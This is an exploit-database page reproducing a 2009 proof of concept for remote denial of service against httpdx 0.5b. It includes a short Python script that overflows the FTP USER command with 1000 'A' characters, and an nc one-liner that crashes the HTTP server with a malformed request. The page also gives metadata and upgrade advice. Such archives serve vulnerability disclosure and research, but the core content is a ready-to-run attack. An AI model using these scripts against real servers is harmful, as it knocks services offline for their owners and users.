header-logo
Suggest Exploit
vendor:
httpdx
by:
sico2819
7,5
CVSS
HIGH
Multiple Remote Denial of Service (DoS)
N/A
CWE
Product Name: httpdx
Affected Version From: 0.5b
Affected Version To: 0.5b
Patch Exists: Yes
Related CWE: N/A
CPE: a:httpdx:httpdx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 FR
2009

httpdx <= 0.5b multiple remote DOS POC

httpdx <= 0.5b is vulnerable to multiple remote DOS, in both HTTP and FTP server. For FTP DOS, httpdx FTP crashed by multiple ways, due to BOF in many commands (USER, PASS, CWD, ...). For HTTP DOS, httpdx crashed by sending a special HTTP request: 'GET / HTTP/1.1Host: '. The POC for FTP DOS is a python script and the POC for HTTP DOS is an echo command.

Mitigation:

Upgrade to the latest version of httpdx.
Source

Exploit-DB raw data:

*****************************
* OSCP TEAM Vuln Discovery  *
*****************************
*        sico2819           *
*****************************

http://offensive-security.com

**************************************
httpdx <= 0.5b multiple remote DOS POC
**************************************

sourceforge.net/projects/httpdx/


SYSTEM USED : WinXP SP3 FR


***************
POC POC POC POC
***************


httpdx <= 0.5b is vulnerable to multiple remote DOS, in both HTTP and FTP server.

*******************
***** FTP DOS *****
*******************

httpdx FTP crashed by multiple ways, due to BOF in many commands (USER, PASS, CWD, ...)

POC :

------ poc.py ----------

import socket

HOST = [ change host addr ]
PORT = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
data= s.recv(1024)
s.send('USER '+'A'*1000)
s.close()

------- EOF -------------

*******************
**** HTTP DOS *****
*******************

httpdx crashed by sending a special HTTP request :

"GET / HTTP/1.1Host: "

POC :

echo "GET / HTTP/1.1Host: "|nc [HOST] 80





This is a OSCP Team POC, more to come !!

sico2819

# milw0rm.com [2009-05-18]

Navigation

Suggest Exploit

Services By CQR